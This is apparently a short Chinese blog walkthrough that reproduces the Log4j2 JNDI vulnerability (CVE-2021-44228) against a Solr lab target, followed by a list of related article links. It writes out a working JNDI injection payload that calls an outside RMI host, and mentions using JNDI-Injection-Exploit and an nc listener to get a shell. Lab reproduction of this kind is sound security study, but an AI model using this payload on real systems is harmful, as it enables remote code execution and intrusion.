阿一网络安全之log4j2漏洞CVE-2021-44228复现

漏洞简介

Apache Log4j 2 是对 Log4j 的升级,它⽐其前身 Log4j 1.x 提供了显 着改进,并提供了 Logback 中可⽤的许多改进,同时修复了 Logback 架构中的⼀些固有问题。
2021 年 12 ⽉,在 Apache Log4j2 中发现了⼀个 0-day 漏洞。
Log4j 的 JNDI ⽀持并没有限制可以解析的名称。⼀些协议像rmi:和 ldap:是不安全的或者可以允许远程代码执⾏。

开启靶场


JNDI-Injection-Exploit-1.0.jar 开启 RMI 服务


在 url 中插⼊构造的 payload
http://192.168.121.129:8983/solr/admin/cores? action=${jndi:rmi://116.62.17.187:1099/qdz3ly}
开启 nc 监听,成功 getshell

其实很简单,大家加油。

相关推荐
Lyndon11071 小时前
K8S 九 安全认证 TLS
安全·容器·kubernetes
hqxstudying5 小时前
Java异常处理
java·开发语言·安全·异常
终焉暴龙王13 小时前
CTFHub web进阶 php Bypass disable_function通关攻略
开发语言·安全·web安全·php
百川14 小时前
Apache文件解析漏洞
web安全·apache
qq_4309085721 小时前
网络安全-机遇与挑战
安全
希望奇迹很安静21 小时前
SSRF_XXE_RCE_反序列化学习
学习·web安全·ctf·渗透测试学习
程序员编程指南1 天前
Qt 网络编程进阶:网络安全与加密
c语言·网络·c++·qt·web安全
安 当 加 密1 天前
守护汽车“空中升级“:基于HSM/KMS的安全OTA固件签名与验证方案
安全·汽车
大咖分享课1 天前
多租户系统中的安全隔离机制设计
人工智能·安全·安全隔离
荔枝吻1 天前
软件异常读写威胁硬盘安全:从过往案例到防护之道
安全·硬盘